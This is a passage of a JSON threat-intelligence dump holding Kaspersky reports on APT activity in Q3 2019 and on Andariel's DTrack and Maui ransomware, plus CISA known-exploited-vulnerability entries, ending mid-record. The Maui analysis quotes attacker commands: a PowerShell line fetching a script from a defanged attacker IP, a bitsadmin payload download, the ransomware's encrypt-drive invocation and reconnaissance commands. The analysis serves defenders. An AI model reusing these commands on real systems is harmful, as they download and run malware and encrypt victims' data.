non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contain many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, show a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. 
It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as track GPS position. There is no mechanism to survive a reboot, but the capability to steal sign-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v4l2 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. 
A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a .NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. 
All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts, .NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over HTTP for lateral movement; (d) various system and network utilities. 
Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in Bangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. 
The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. 
In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. 
However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. 
This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. 
Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. 
The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. 
However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-10-16T10:00:26", "type": "securelist", "title": "APT trends report Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, CISA published an alert, entitled \"[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>),\" related to a Stairwell report, \"[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>).\" Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their \"first seen\" date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. 
Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. 
The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using \"-t\" and \"-x\" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, \"-t 8\" sets the ransomware thread count to eight, \"-x\" commands the malware to \"self melt\", and the \"E:\" value sets the path (the entire drive in this case) to be encrypted. 
The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. 
This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and \"whoami\" was executed, the PowerShell command below was executed to fetch an additional PowerShell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the PowerShell command to fetch the additional script. The fetched script is capable of downloading a PowerShell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). 
Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as "Backdoor.Preft" malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as "aka Dtrack, Valefor". 
Apart from the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor's TTPs behind the Maui ransomware incident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-08-09T10:00:46", "id": "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "href": "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Oracle Corporation WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-10271", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Atlassian Confluence Server The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 
before 7.12.5 contains an OGNL injection vulnerability which allows an attacker to execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server < 6.13.23, 6.14.0 - 7.12.5 Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26084", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Drupal module configuration vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-7600", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server, Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
